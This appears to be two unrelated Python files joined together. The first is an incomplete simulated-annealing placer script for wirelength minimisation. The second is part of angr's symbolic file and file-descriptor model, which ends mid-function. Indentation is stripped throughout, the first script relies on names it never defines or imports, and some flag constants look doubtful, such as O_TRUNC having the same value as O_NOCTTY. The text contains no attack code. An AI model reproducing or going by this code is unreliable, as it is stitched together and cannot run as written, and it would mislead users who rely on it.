nets = [] #net details
nodes = {} #store all nodes in a dictionary
grid = [] #stores grid size
netsn = 0 #number of nets
nodesn = 0 #number of nodes
optimum = {}#optimum results
plot_x = []
plot_y = []
old_swap = [None, None]#previously swapped nodes
new_swap = [None, None] #currently proposed moves to swap
## Simulated Annealing variables
current_cost = 0 #initial or current cost
new_cost = 0 #new proposed cost
old_temp = 0 #previous temperature
current_temp = 0 #current or initial temperature
iterations = 0 #iterations
##################### NOTES ###################
#to get sinks for a node
#get nodedata by nodes[number][0]
#get sinks list by nodes[number][1]
#function to read file
def readfile(filename):
global grid, netsn, nodesn, nets, nodes
#split lines to read one by one
lines = open(filename).read().splitlines()
#extract grid
grid = [int(lines[0].split(' ')[-1]),int(lines[0].split(' ')[-2])]
nets = []
#iterate lines, extract number of nets and individual net nodes
for i in range(len(lines)):
if(i==0):
netsn = int(lines[i].split(' ')[-3]) #extract number of nets
nodesn = int(lines[i].split(' ')[0]) #extract number of nodes
#generate coordinates for nodes which we will use for cost eval
coordinates = []
for c in range(grid[0]):
for r in range(grid[1]):
coordinates.append([c,r*2])
#based on number of nodes, create dictionary keys
for each_node in range(grid[0]*grid[1]):
nodes[str(each_node)] = [coordinates[each_node],[]]
else:
#separate the net details and put them in a list
temp = list(filter(None,lines[i].split(' ')[1:]))
if(len(temp)>0):
nets.append(temp)
# associate nodes to their connections
source =temp[0]
sinks = temp[1:]
for each_sink in sinks:
nodes[source][1].append([each_sink])
# for nodes with no sinks, set None as their sinks so no arrows emerge from those nodes
for each_node in nodes:
sink_list = nodes[str(each_node)][1]
if(len(sink_list)==0):
nodes[str(each_node)][1].append(None)
#run the read function
readfile(filename)
# select two nodes which have not been repeated in the previous swap
def select_nodes(nodes_dict, previous_swaps):
new_lot = []
while True:
if(len(new_lot)==2):
#check if i am swapping two unoccupied slots
a = new_lot[0]
b = new_lot[1]
coor_a = nodes_dict[a][0][0]
coor_b = nodes_dict[b][0][0]
if(coor_a == None and coor_b == None):
print(new_lot)
new_lot = []
else:
return new_lot
new_node = random.choice([x for x in range(grid[0]*grid[1]) if x not in previous_swaps])
new_lot.append(str(new_node))
# accept moves
def make_swap(nodes_dict,swap):
a = swap[0]
b = swap[1]
coor_a = nodes_dict[a][0]
coor_b = nodes_dict[b][0]
nodes_dict[a][0] = coor_b
nodes_dict[b][0] = coor_a
return(nodes_dict)
#function to calculate cost
def calculate_cost(nodes_dict, nets):
cost = []
for each_net in nets:
net_x = []
net_y = []
dx = 0
dy = 0
for each_node in each_net:
data = nodes_dict[each_node][0]
net_x.append(data[0])
net_y.append(data[1])
#calculate half-perimeter
dx = abs(max(net_x) - min(net_x))
dy = abs(max(net_y) - min(net_y))
cost.append(dx+dy)
return(sum(cost))
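# Worked example of the half-perimeter wirelength (HPWL) above: a net whose
# nodes sit at (0,0), (2,4) and (1,2) spans dx = 2 and dy = 4, contributing
# 6 to the total cost; the placer minimizes the sum of these spans over all nets.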
#timer function
start_time = timeit.default_timer()
#setup SA
if(user_iterations == 0):
iterations = int(10*((nodesn)**(4/3)))
else:
iterations = user_iterations
initial_cost = calculate_cost(nodes, nets)
sigma = 0 #std dev of cost of accepted solutions
sigma_list = [] #list to store solutions
r_val = []
#set initial temperature
if(user_temp == 0):
for i in range(50):
sigma_node = copy.deepcopy(nodes)
sigma_swap = select_nodes(sigma_node, old_swap)
old_swap = sigma_swap
sigma_node = make_swap(sigma_node, sigma_swap)
temp_cost = calculate_cost(sigma_node, nets)
if(temp_cost<initial_cost):
sigma_list.append(temp_cost)
#calculate the standard deviation of accepted sigma values
sigma = statistics.stdev(sigma_list)
current_temp = 20*sigma
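# Starting at 20x the standard deviation of accepted-move costs is a common
# simulated-annealing heuristic: the initial temperature is high enough that
# nearly all proposed swaps are accepted at first.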
print(initial_cost, current_temp, iterations)
old_swap=[None, None]
#start with simulated annealing
#start plotting
if(gui_choice == "y"):
queue = Queue.Queue()
plot_thread = threading.Thread(target=pt.plotter, args=(queue, ))
plot_thread.start()
#check if cost is being repeated
isrepeating = 0
#record optimum node ever came across
optimum = nodes
while current_temp!=0:
sigma_list = []
for i in range(iterations):
current_cost = calculate_cost(nodes, nets)
#copy nodes data
temp_nodes = copy.deepcopy(nodes)
#get nodes to swap for temp_nodes
new_swap = select_nodes(temp_nodes, old_swap)
old_swap = new_swap
#modify node data
temp_nodes = make_swap(temp_nodes, new_swap)
#get cost for new swap
new_cost = calculate_cost(temp_nodes, nets)
dc = new_cost - current_cost
#if good
if(dc<0):
nodes = temp_nodes
sigma_list.append(new_cost)
#update best
#if bad
else:
r = random.random()
if(r< math.e**(-dc/current_temp)):
nodes = temp_nodes
sigma_list.append(new_cost)
if(calculate_cost(nodes, nets)<calculate_cost(optimum,nets)):
optimum = nodes
#current_temp = 0.98 *current_temp
#acceptance ratio of moves accepted to total tried
R_accept = len(sigma_list)/iterations
previous_temp = copy.deepcopy(current_temp)
if(0.96 < R_accept):
alpha = 0.5
elif(0.8 < R_accept and R_accept<=0.96):
alpha = 0.9
elif(0.05 < R_accept and R_accept<=0.8):
if(iterations==500):
alpha = 0.98
else:
alpha = 0.95
elif(R_accept<=0.05):
alpha = 0.8
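# The cooling factor alpha adapts to the acceptance ratio: cool quickly (0.5
# or 0.8) when almost everything or almost nothing is being accepted, and
# cool slowly (0.9-0.98) in the productive middle range where most of the
# cost improvement happens.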
r_val.append(alpha)
try:
if(hybrid == 1):
#check if temperature is stuck
if(isrepeating ==5):
current_temp = alpha*current_temp
isrepeating = 0
elif(isrepeating >=10):
current_temp = 0
else:
sigma = statistics.stdev(sigma_list)
current_temp = current_temp *math.e**(-0.7*(current_temp/sigma))
isrepeating = 0
else:
current_temp = alpha*current_temp
isrepeating = 0
except Exception as e:
pass  # stdev() fails when fewer than two moves were accepted; leave the temperature unchanged for this round
#COMMENT THIS LINE IF DONT WANT ANY UPDATES
print(alpha,calculate_cost(nodes, nets), current_temp )
if(str(previous_temp)[:7] == str(current_temp)[:7]):
isrepeating = isrepeating + 1
#print(isrepeating)
if(current_temp<5e-6):
current_temp = 0
#add for plotting
if(gui_choice == "y"):
pt.update_data_sync(current_temp, calculate_cost(nodes, nets))
queue.put("GO")
# print(calculate_cost(nodes,nets), current_temp)
final_cost = calculate_cost(nodes, nets)
elapsed = timeit.default_timer() - start_time
print("time elapsed : ", elapsed)
print("final cost :", final_cost)
if(gui_choice == 'y'):
queue.put('BYE')
|
|
import claripy
import logging
import itertools
from .memory_object import SimMemoryObject
from ..state_plugins.plugin import SimStatePlugin
from ..state_plugins.sim_action_object import SimActionObject
from ..state_plugins.symbolic_memory import SimSymbolicMemory
from .. import sim_options
from ..errors import SimFileError, SimMergeError, SimSolverError
l = logging.getLogger(name=__name__)
file_counter = itertools.count()
dialogue_counter = itertools.count()
class Flags: # pylint: disable=W0232,
O_RDONLY = 0
O_WRONLY = 1
O_RDWR = 2
O_ACCMODE = 3 # bitmask for read/write mode
O_APPEND = 4096
O_ASYNC = 64
O_CLOEXEC = 512
# TODO mode for this flag
O_CREAT = 256
O_DIRECT = 262144
O_DIRECTORY = 2097152
O_EXCL = 2048
O_LARGEFILE = 1048576
O_NOATIME = 16777216
O_NOCTTY = 1024
O_NOFOLLOW = 4194304
O_NONBLOCK = 8192
O_NODELAY = 8192
O_SYNC = 67174400
O_TRUNC = 1024
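# These constants form a bitfield mirroring the POSIX open(2) flags: e.g.
# (flags & Flags.O_ACCMODE) == Flags.O_WRONLY tests for write-only mode, and
# SimFileDescriptor.write_data below checks flags & Flags.O_APPEND the same way.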
def _deps_unpack(a):
if isinstance(a, SimActionObject):
return a.ast, a.reg_deps, a.tmp_deps
else:
return a, None, None
class SimFileBase(SimStatePlugin):
"""
SimFiles are the storage mechanisms used by SimFileDescriptors.
Different types of SimFiles can have drastically different interfaces, and as a result there's not much that can be
specified on this base class. All the read and write methods take a ``pos`` argument, which may have different
semantics per-class. ``0`` will always be a valid position to use, though, and the next position you should use
is part of the return tuple.
Some simfiles are "streams", meaning that the position that reads come from is determined not by the position you
pass in (it will in fact be ignored), but by an internal variable. This is stored as ``.pos`` if you care to read
it. Don't write to it. The same lack-of-semantics applies to this field as well.
:ivar name: The name of the file. Purely for cosmetic purposes
:ivar ident: The identifier of the file, typically autogenerated from the name and a nonce. Purely for cosmetic
purposes, but does appear in symbolic values autogenerated in the file.
:ivar seekable: Bool indicating whether seek operations on this file should succeed. If this is True, then ``pos``
must be a number of bytes from the start of the file.
:ivar writable: Bool indicating whether writing to this file is allowed.
:ivar pos: If the file is a stream, this will be the current position. Otherwise, None.
:ivar concrete: Whether or not this file contains mostly concrete data. Will be used by some SimProcedures to
choose how to handle variable-length operations like fgets.
"""
seekable = False
pos = None
def __init__(self, name, writable=True, ident=None, concrete=False, **kwargs):
self.name = name
self.ident = ident
self.writable = writable
self.concrete = concrete
if ident is None:
self.ident = self.make_ident(self.name)
if 'memory_id' in kwargs:
kwargs['memory_id'] = self.ident
super(SimFileBase, self).__init__(**kwargs)
@staticmethod
def make_ident(name):
if type(name) is str:
name = name.encode()
def generate():
consecutive_bad = 0
for ch in name:
if 0x20 <= ch <= 0x7e:
consecutive_bad = 0
yield chr(ch)
elif consecutive_bad < 3:
consecutive_bad += 1
yield '?'
nice_name = ''.join(generate())
return 'file_%d_%s' % (next(file_counter), nice_name)
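# For example, make_ident(b'flag.txt') might produce 'file_0_flag.txt' for the
# first file created; unprintable bytes in the name are replaced with '?',
# capped at three consecutive replacements.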
def concretize(self, **kwargs):
"""
Return a concretization of the contents of the file. The type of the return value of this method will vary
depending on which kind of SimFile you're using.
"""
raise NotImplementedError
def read(self, pos, size, **kwargs):
"""
Read some data from the file.
:param pos: The offset in the file to read from.
:param size: The size to read. May be symbolic.
:return: A tuple of the data read (a bitvector of the length that is the maximum length of the read), the actual size of the read, and the new file position pointer.
"""
raise NotImplementedError
def write(self, pos, data, size=None, **kwargs):
"""
Write some data to the file.
:param pos: The offset in the file to write to. May be ignored if the file is a stream or device.
:param data: The data to write as a bitvector
:param size: The optional size of the data to write. If not provided will default to the length of the data.
Must be constrained to less than or equal to the size of the data.
:return: The new file position pointer.
"""
raise NotImplementedError
@property
def size(self):
"""
The number of data bytes stored by the file at present. May be a symbolic value.
"""
raise NotImplementedError
class SimFile(SimFileBase, SimSymbolicMemory):
"""
The normal SimFile is meant to model files on disk. It subclasses SimSymbolicMemory so loads and stores to/from
it are very simple.
:param name: The name of the file
:param content: Optional initial content for the file as a string or bitvector
:param size: Optional size of the file. If content is not specified, it defaults to zero
:param has_end: Whether the size boundary is treated as the end of the file or a frontier at which new content
will be generated. If unspecified, will pick its value based on options.FILES_HAVE_EOF. Another
caveat is that if the size is also unspecified this value will default to False.
:param seekable: Optional bool indicating whether seek operations on this file should succeed, default True.
:param writable: Whether writing to this file is allowed
:param concrete: Whether or not this file contains mostly concrete data. Will be used by some SimProcedures to
choose how to handle variable-length operations like fgets.
:ivar has_end: Whether this file has an EOF
"""
def __init__(self, name, content=None, size=None, has_end=None, seekable=True, writable=True, ident=None, concrete=None, **kwargs):
kwargs['memory_id'] = kwargs.get('memory_id', 'file')
super(SimFile, self).__init__(name, writable=writable, ident=ident, **kwargs)
self._size = size
self.has_end = has_end
self.seekable = seekable
# this is hacky because we need to work around not having a state yet
content = _deps_unpack(content)[0]
if type(content) is bytes:
if concrete is None: concrete = True
content = claripy.BVV(content)
elif type(content) is str:
if concrete is None: concrete = True
content = claripy.BVV(content.encode())
elif content is None:
pass
elif isinstance(content, claripy.Bits):
if concrete is None and not content.symbolic: concrete = True
pass
else:
raise TypeError("Can't handle SimFile content of type %s" % type(content))
if concrete is None:
concrete = False
self.concrete = concrete
if content is not None:
mo = SimMemoryObject(content, 0, length=len(content)//8)
self.mem.store_memory_object(mo)
if self._size is None:
self._size = len(content) // 8
else:
if self._size is None:
self._size = 0
if has_end is None:
self.has_end = False
@property
def category(self): # override trying to determine from self.id to allow arbitrary idents
return 'file'
def set_state(self, state):
super(SimFile, self).set_state(state)
if self.has_end is None:
self.has_end = sim_options.FILES_HAVE_EOF in state.options
if type(self._size) is int:
self._size = claripy.BVV(self._size, state.arch.bits)
elif len(self._size) != state.arch.bits:
raise TypeError("SimFile size must be a bitvector of size %d (arch.bits)" % state.arch.bits)
@property
def size(self):
return self._size
def concretize(self, **kwargs):
"""
Return a concretization of the contents of the file, as a flat bytestring.
"""
size = self.state.solver.min(self._size, **kwargs)
data = self.load(0, size)
kwargs['cast_to'] = kwargs.get('cast_to', bytes)
kwargs['extra_constraints'] = tuple(kwargs.get('extra_constraints', ())) + (self._size == size,)
return self.state.solver.eval(data, **kwargs)
def read(self, pos, size, **kwargs):
disable_actions = kwargs.pop('disable_actions', False)
inspect = kwargs.pop('inspect', True)
# Step 1: figure out a reasonable concrete size to use for the memory load
# since we don't want to concretize anything
if self.state.solver.symbolic(size):
try:
passed_max_size = self.state.solver.max(size, extra_constraints=(size < self.state.libc.max_packet_size,))
except SimSolverError:
passed_max_size = self.state.solver.min(size)
l.warning("Symbolic read size is too large for threshold - concretizing to min (%d)", passed_max_size)
self.state.solver.add(size == passed_max_size)
else:
passed_max_size = self.state.solver.eval(size)
if passed_max_size > 2**13:
l.warning("Program performing extremely large reads")
# Step 2.1: check for the possibility of EOFs
# If it's not possible to EOF (because there's no EOF), this is very simple!
if not self.has_end:
# bump the storage size as we read
self._size = self.state.solver.If(size + pos > self._size, size + pos, self._size)
return self.load(pos, passed_max_size, disable_actions=disable_actions, inspect=inspect), size, size + pos
# Step 2.2: check harder for the possibility of EOFs
# This is the size if we're reading to the end of the file
distance_to_eof = self._size - pos
distance_to_eof = self.state.solver.If(self.state.solver.SLE(distance_to_eof, 0), 0, distance_to_eof)
# try to frontload some constraint solving to see if it's impossible for this read to EOF
if self.state.solver.satisfiable(extra_constraints=(size > distance_to_eof,)):
# it's possible to EOF
# final size = min(passed_size, max(distance_to_eof, 0))
real_size = self.state.solver.If(size >= distance_to_eof, distance_to_eof, size)
return self.load(pos, passed_max_size, disable_actions=disable_actions, inspect=inspect), \
real_size, real_size + pos
else:
# it's not possible to EOF
# we don't need to constrain or min/max the output size because there are already constraints asserting
# that the total filesize is pretty big
# note: this assumes that constraints cannot be removed
return self.load(pos, passed_max_size, disable_actions=disable_actions, inspect=inspect), size, size + pos
def write(self, pos, data, size=None, events=True, **kwargs):
if events:
self.state.history.add_event('fs_write', filename=self.name, data=data, size=size, pos=pos)
data = _deps_unpack(data)[0]
if size is None:
size = len(data) // self.state.arch.byte_width if isinstance(data, claripy.Bits) else len(data)
# \(_^^)/
self.store(pos, data, size=size)
new_end = _deps_unpack(pos + size)[0] # decline to store SAO
self._size = self.state.solver.If(new_end > self._size, new_end, self._size)
return new_end
@SimStatePlugin.memo
def copy(self, _):
#l.debug("Copying %d bytes of memory with id %s." % (len(self.mem), self.id))
return type(self)(name=self.name, size=self._size, has_end=self.has_end, seekable=self.seekable, writable=self.writable, ident=self.ident, concrete=self.concrete,
mem=self.mem.branch(),
memory_id=self.id,
endness=self.endness,
abstract_backer=self._abstract_backer,
read_strategies=[ s.copy() for s in self.read_strategies ],
write_strategies=[ s.copy() for s in self.write_strategies ],
stack_region_map=self._stack_region_map,
generic_region_map=self._generic_region_map
)
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
if not all(type(o) is type(self) for o in others):
raise SimMergeError("Cannot merge files of disparate type")
if any(o.has_end != self.has_end for o in others):
raise SimMergeError("Cannot merge files where some have ends and some don't")
self._size = self.state.solver.ite_cases(zip(merge_conditions[1:], (o._size for o in others)), self._size)
return super(SimFile, self).merge(others, merge_conditions, common_ancestor=common_ancestor)
def widen(self, _):
raise SimMergeError("Widening the filesystem is unsupported")
class SimFileStream(SimFile):
"""
A specialized SimFile that uses a flat memory backing, but functions as a stream, tracking its position internally.
The pos argument to the read and write methods will be ignored, and write will return None. Instead, there is an
attribute ``pos`` on the file itself, which will give you what you want.
:param name: The name of the file, for cosmetic purposes
:param pos: The initial position of the file, default zero
:param kwargs: Any other keyword arguments will go on to the SimFile constructor.
:ivar pos: The current position in the file.
"""
def __init__(self, name, content=None, pos=0, **kwargs):
super(SimFileStream, self).__init__(name, content=content, **kwargs)
self.pos = pos
def set_state(self, state):
super(SimFileStream, self).set_state(state)
if type(self.pos) is int:
self.pos = state.solver.BVV(self.pos, state.arch.bits)
elif len(self.pos) != state.arch.bits:
raise TypeError("SimFileStream position must be a bitvector of size %d (arch.bits)" % state.arch.bits)
def read(self, pos, size, **kwargs):
no_stream = kwargs.pop('no_stream', False)
if not no_stream:
pos = self.pos
data, size, pos = super(SimFileStream, self).read(pos, size, **kwargs)
if not no_stream:
self.pos = pos
return data, size, pos
def write(self, _, data, size=None, **kwargs):
self.pos = super(SimFileStream, self).write(self.pos, data, size, **kwargs)
return None
@SimStatePlugin.memo
def copy(self, memo):
c = super(SimFileStream, self).copy(memo)
c.pos = self.pos
return c
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
self.pos = self.state.solver.ite_cases(zip(merge_conditions[1:], [o.pos for o in others]), self.pos)
return super(SimFileStream, self).merge(others, merge_conditions, common_ancestor=common_ancestor)
class SimPackets(SimFileBase):
"""
The SimPackets is meant to model inputs whose content is delivered as a series of asynchronous chunks. The data is
stored as a list of read or write results. For symbolic sizes, state.libc.max_packet_size will be respected. If
the SHORT_READS option is enabled, reads will return a symbolic size constrained to be less than or equal to the
requested size.
A SimPackets cannot be used for both reading and writing - for socket objects that can be both read and written to
you should use a file descriptor to multiplex the read and write operations into two separate file storage
mechanisms.
:param name: The name of the file, for cosmetic purposes
:param write_mode: Whether this file is opened in read or write mode. If this is unspecified it will be
autodetected.
:param content: Some initial content to use for the file. Can be a list of bytestrings or a list of tuples of
content ASTs and size ASTs.
:ivar write_mode: See the eponymous parameter
:ivar content: A list of packets, as tuples of content ASTs and size ASTs.
"""
def __init__(self, name, write_mode=None, content=None, writable=True, ident=None, **kwargs):
super(SimPackets, self).__init__(name, writable=writable, ident=ident, **kwargs)
self.write_mode = write_mode
self.content = content
if self.content is None:
self.content = []
else:
self.content = [
x if type(x) is tuple \
else (x, len(x) // 8) if isinstance(x, claripy.Bits) \
else (x.ast, len(x) // 8) if isinstance(x, SimActionObject) \
else (claripy.BVV(x), len(x)) if type(x) is bytes \
else None \
for x in self.content]
if any(x is None for x in self.content):
raise TypeError("Bad type in initial SimPacket content")
def set_state(self, state):
super().set_state(state)
# sanitize the lengths in self.content now that we know the wordsize
for i, (data, length) in enumerate(self.content):
if type(length) is int:
self.content[i] = (data, claripy.BVV(length, state.arch.bits))
elif len(length) < state.arch.bits:
self.content[i] = (data, length.zero_extend(state.arch.bits - len(length)))
elif len(length) != state.arch.bits:
raise TypeError('Bad bitvector size for length in SimPackets.content')
@property
def size(self):
return sum(x[1] for x in self.content)
def concretize(self, **kwargs):
"""
Returns a list of the packets read or written as bytestrings.
"""
lengths = [self.state.solver.eval(x[1], **kwargs) for x in self.content]
kwargs['cast_to'] = bytes
return [b'' if i == 0 else self.state.solver.eval(x[0][i*self.state.arch.byte_width-1:], **kwargs) for i, x in zip(lengths, self.content)]
def read(self, pos, size, **kwargs):
"""
Read a packet from the stream.
:param int pos: The packet number to read from the sequence of the stream. May be None to append to the stream.
:param size: The size to read. May be symbolic.
:param short_reads: Whether to replace the size with a symbolic value constrained to less than or equal to the original size. If unspecified, will be chosen based on the state option.
:return: A tuple of the data read (a bitvector of the length that is the maximum length of the read) and the actual size of the read.
"""
short_reads = kwargs.pop('short_reads', None)
# sanity check on read/write modes
if self.write_mode is None:
self.write_mode = False
elif self.write_mode is True:
raise SimFileError("Cannot read and write to the same SimPackets")
# sanity check on packet number and determine if data is already present
if pos is None:
pos = len(self.content)
if pos < 0:
raise SimFileError("SimPacket.read(%d): Negative packet number?" % pos)
elif pos > len(self.content):
raise SimFileError("SimPacket.read(%d): Packet number is past frontier of %d?" % (pos, len(self.content)))
elif pos != len(self.content):
_, realsize = self.content[pos]
self.state.solver.add(realsize <= size) # assert that the packet fits within the read request
if not self.state.solver.satisfiable():
raise SimFileError("SimPackets could not fit the current packet into the read request of %s bytes: %s" % (size, self.content[pos]))
return self.content[pos] + (pos+1,)
# typecheck
if type(size) is int:
size = self.state.solver.BVV(size, self.state.arch.bits)
# The read is on the frontier. let's generate a new packet.
orig_size = size
max_size = None
# if short reads are enabled, replace size with a symbol
if short_reads is True or (short_reads is None and sim_options.SHORT_READS in self.state.options):
size = self.state.solver.BVS('packetsize_%d_%s' % (len(self.content), self.ident), self.state.arch.bits, key=('file', self.ident, 'packetsize', len(self.content)))
self.state.solver.add(size <= orig_size)
# figure out the maximum size of the read
if not self.state.solver.symbolic(size):
max_size = self.state.solver.eval(size)
elif self.state.solver.satisfiable(extra_constraints=(size <= self.state.libc.max_packet_size,)):
l.info("Constraining symbolic packet size to be less than %d", self.state.libc.max_packet_size)
if not self.state.solver.is_true(orig_size <= self.state.libc.max_packet_size):
self.state.solver.add(size <= self.state.libc.max_packet_size)
if not self.state.solver.symbolic(orig_size):
max_size = min(self.state.solver.eval(orig_size), self.state.libc.max_packet_size)
else:
max_size = self.state.solver.max(size)
else:
max_size = self.state.solver.min(size)
l.warning("Could not constrain symbolic packet size to <= %d; using minimum %d for size", self.state.libc.max_packet_size, max_size)
self.state.solver.add(size == max_size)
# generate the packet data and return it
data = self.state.solver.BVS('packet_%d_%s' % (len(self.content), self.ident), max_size * self.state.arch.byte_width, key=('file', self.ident, 'packet', len(self.content)))
packet = (data, size)
self.content.append(packet)
return packet + (pos+1,)
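# The generated packet is a fresh symbol named e.g. 'packet_0_file_0_stdin'
# (its index in the stream plus the file ident), sized at most
# state.libc.max_packet_size bytes unless the requested size is concrete.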
def write(self, pos, data, size=None, events=True, **kwargs):
"""
Write a packet to the stream.
:param int pos: The packet number to write in the sequence of the stream. May be None to append to the stream.
:param data: The data to write, as a string or bitvector.
:param size: The optional size to write. May be symbolic; must be constrained to at most the size of data.
:return: The next packet to use after this
"""
if events:
self.state.history.add_event('fs_write', filename=self.name, data=data, size=size, pos=pos)
# sanity check on read/write modes
if self.write_mode is None:
self.write_mode = True
elif self.write_mode is False:
raise SimFileError("Cannot read and write to the same SimPackets")
data = _deps_unpack(data)[0]
if type(data) is bytes:
data = claripy.BVV(data)
if size is None:
size = len(data) // self.state.arch.byte_width if isinstance(data, claripy.Bits) else len(data)
if type(size) is int:
size = self.state.solver.BVV(size, self.state.arch.bits)
# sanity check on packet number and determine if data is already present
if pos < 0:
raise SimFileError("SimPacket.write(%d): Negative packet number?" % pos)
elif pos > len(self.content):
raise SimFileError("SimPacket.write(%d): Packet number is past frontier of %d?" % (pos, len(self.content)))
elif pos != len(self.content):
realdata, realsize = self.content[pos]
maxlen = max(len(realdata), len(data))
self.state.solver.add(realdata[maxlen-1:0] == data[maxlen-1:0])
self.state.solver.add(size == realsize)
if not self.state.solver.satisfiable():
raise SimFileError("Packet write equality constraints made state unsatisfiable???")
return pos+1
# write it out!
self.content.append((_deps_unpack(data)[0], size))
return pos+1
@SimStatePlugin.memo
def copy(self, memo): # pylint: disable=unused-argument
return type(self)(self.name, write_mode=self.write_mode, content=self.content, ident=self.ident, concrete=self.concrete)
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
for o in others:
if o.write_mode is None:
continue
elif self.write_mode is None:
self.write_mode = o.write_mode
elif self.write_mode is not o.write_mode:
raise SimMergeError("Cannot merge SimPackets with disparate write_mode")
for o in others:
if len(o.content) != len(self.content):
raise SimMergeError("Cannot merge SimPackets with disparate number of packets")
for i, default in enumerate(self.content):
max_data_length = max(len(default[0]), max(len(o.content[i][0]) for o in others))
merged_data = self.state.solver.ite_cases(
zip(
merge_conditions[1:],
(o.content[i][0].concat(claripy.BVV(0, max_data_length - len(o.content[i][0]))) for o in others)
), default[0])
merged_size = self.state.solver.ite_cases(zip(merge_conditions[1:], (o.content[i][1] for o in others)), default[1])
self.content[i] = (merged_data, merged_size)
return True
def widen(self, _):
raise SimMergeError("Widening the filesystem is unsupported")
class SimPacketsStream(SimPackets):
"""
A specialized SimPackets that tracks its position internally.
The pos argument to the read and write methods will be ignored, and write will return None. Instead, there is an
attribute ``pos`` on the file itself, which will give you what you want.
:param name: The name of the file, for cosmetic purposes
:param pos: The initial position of the file, default zero
:param kwargs: Any other keyword arguments will go on to the SimPackets constructor.
:ivar pos: The current position in the file.
"""
def __init__(self, name, pos=0, **kwargs):
super(SimPacketsStream, self).__init__(name, **kwargs)
self.pos = pos
def read(self, _, size, **kwargs):
no_stream = kwargs.pop('no_stream', False)
if not no_stream:
pos = self.pos
data, size, pos = super(SimPacketsStream, self).read(pos, size, **kwargs)
if not no_stream:
self.pos = pos
return data, size, pos
def write(self, _, data, size=None, **kwargs):
self.pos = super(SimPacketsStream, self).write(self.pos, data, size, **kwargs)
return None
@SimStatePlugin.memo
def copy(self, memo):
c = super(SimPacketsStream, self).copy(memo)
c.pos = self.pos
return c
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
if any(o.pos != self.pos for o in others):
raise SimMergeError("Can't merge SimPacketsStreams with disparate positions")
return super(SimPacketsStream, self).merge(others, merge_conditions, common_ancestor=common_ancestor)
class SimFileDescriptorBase(SimStatePlugin):
"""
The base class for implementations of POSIX file descriptors.
All file descriptors should respect the CONCRETIZE_SYMBOLIC_{READ,WRITE}_SIZES state options.
"""
def read(self, pos, size, **kwargs):
"""
Reads some data from the file, storing it into memory.
:param pos: The address to write the read data into memory
:param size: The requested length of the read
:return: The real length of the read
"""
data, realsize = self.read_data(size, **kwargs)
if not self.state.solver.is_true(realsize == 0):
self.state.memory.store(pos, data, size=realsize)
return realsize
def write(self, pos, size, **kwargs):
"""
Writes some data, loaded from the state, into the file.
:param pos: The address to read the data to write from in memory
:param size: The requested size of the write
:return: The real length of the write
"""
if type(pos) is str:
raise TypeError("SimFileDescriptor.write takes an address and size. Did you mean write_data?")
# Find a reasonable concrete size for the load since we don't want to concretize anything
# This is copied from SimFile.read
# TODO: refactor into a generic concretization strategy?
if self.state.solver.symbolic(size):
try:
passed_max_size = self.state.solver.max(size, extra_constraints=(size < self.state.libc.max_packet_size,))
except SimSolverError:
passed_max_size = self.state.solver.min(size)
l.warning("Symbolic write size is too large for threshold - concretizing to min (%d)", passed_max_size)
self.state.solver.add(size == passed_max_size)
else:
passed_max_size = self.state.solver.eval(size)
if passed_max_size > 2**13:
l.warning("Program performing extremely large write")
data = self.state.memory.load(pos, passed_max_size)
return self.write_data(data, size, **kwargs)
def read_data(self, size, **kwargs):
"""
Reads some data from the file, returning the data.
:param size: The requested length of the read
:return: A tuple of the data read and the real length of the read
"""
raise NotImplementedError
def write_data(self, data, size=None, **kwargs):
"""
Write some data, provided as an argument into the file.
:param data: A bitvector to write into the file
:param size: The requested size of the write (may be symbolic)
:return: The real length of the write
"""
raise NotImplementedError
def seek(self, offset, whence='start'):
"""
Seek the file descriptor to a different position in the file.
:param offset: The offset to seek to, interpreted according to whence
:param whence: What the offset is relative to; one of the strings "start", "current", or "end"
:return: A symbolic boolean describing whether the seek succeeded or not
"""
raise NotImplementedError
def tell(self):
"""
Return the current position, or None if the concept doesn't make sense for the given file.
"""
raise NotImplementedError
def eof(self):
"""
Return the EOF status. May be a symbolic boolean.
"""
raise NotImplementedError
def size(self):
"""
Return the size of the data stored in the file in bytes, or None if the concept doesn't make sense for the
given file.
"""
raise NotImplementedError
@property
def read_storage(self):
"""
Return the SimFile backing reads from this fd
"""
raise NotImplementedError
@property
def write_storage(self):
"""
Return the SimFile backing writes to this fd
"""
raise NotImplementedError
@property
def read_pos(self):
"""
Return the current position of the read file pointer.
If the underlying read file is a stream, this will return the position of the stream. Otherwise, will return
the position of the file descriptor in the file.
"""
raise NotImplementedError
@property
def write_pos(self):
"""
Return the current position of the write file pointer.
If the underlying write file is a stream, this will return the position of the stream. Otherwise, will return
the position of the file descriptor in the file.
"""
raise NotImplementedError
def concretize(self, **kwargs):
"""
Return a concretization of the data in the underlying file. Has different return types to represent different
data structures on a per-class basis.
Any arguments passed to this will be passed onto state.solver.eval.
"""
raise NotImplementedError
def _prep_read(self, size):
return self._prep_generic(size, True)
def _prep_write(self, size):
return self._prep_generic(size, False)
def _prep_generic(self, size, is_read):
option = sim_options.CONCRETIZE_SYMBOLIC_FILE_READ_SIZES if is_read else sim_options.CONCRETIZE_SYMBOLIC_WRITE_SIZES
string = 'read' if is_read else 'write'
# check if we need to concretize the length
if option in self.state.options and self.state.solver.symbolic(size):
try:
size = self.state.solver.max(size, extra_constraints=(size <= self.state.libc.max_packet_size,))
except SimSolverError:
size = self.state.solver.min(size)
l.info("Concretizing symbolic %s size to %d", string, size)
return size
class SimFileDescriptor(SimFileDescriptorBase):
"""
A simple file descriptor forwarding reads and writes to a SimFile. Contains information about
the current opened state of the file, such as the flags or (if relevant) the current position.
:ivar file: The SimFile described to by this descriptor
:ivar flags: The mode that the file descriptor was opened with, a bitfield of flags
"""
def __init__(self, simfile, flags=0):
super(SimFileDescriptor, self).__init__()
self.file = simfile
self._pos = 0
self.flags = flags
def read_data(self, size, **kwargs):
size = self._prep_read(size)
data, realsize, self._pos = self.file.read(self._pos, size)
return data, realsize
def write_data(self, data, size=None, **kwargs):
if self.flags & Flags.O_APPEND and self.file.seekable:
self._pos = self.file.size
data = _deps_unpack(data)[0]
if size is None:
size = len(data) // self.state.arch.byte_width if isinstance(data, claripy.Bits) else len(data)
size = self._prep_write(size)
self._pos = self.file.write(self._pos, data, size)
return size
def seek(self, offset, whence='start'):
if not self.file.seekable:
return claripy.false
if type(offset) is int:
offset = self.state.solver.BVV(offset, self.state.arch.bits)
if whence == 'start':
new_pos = offset
elif whence == 'current':
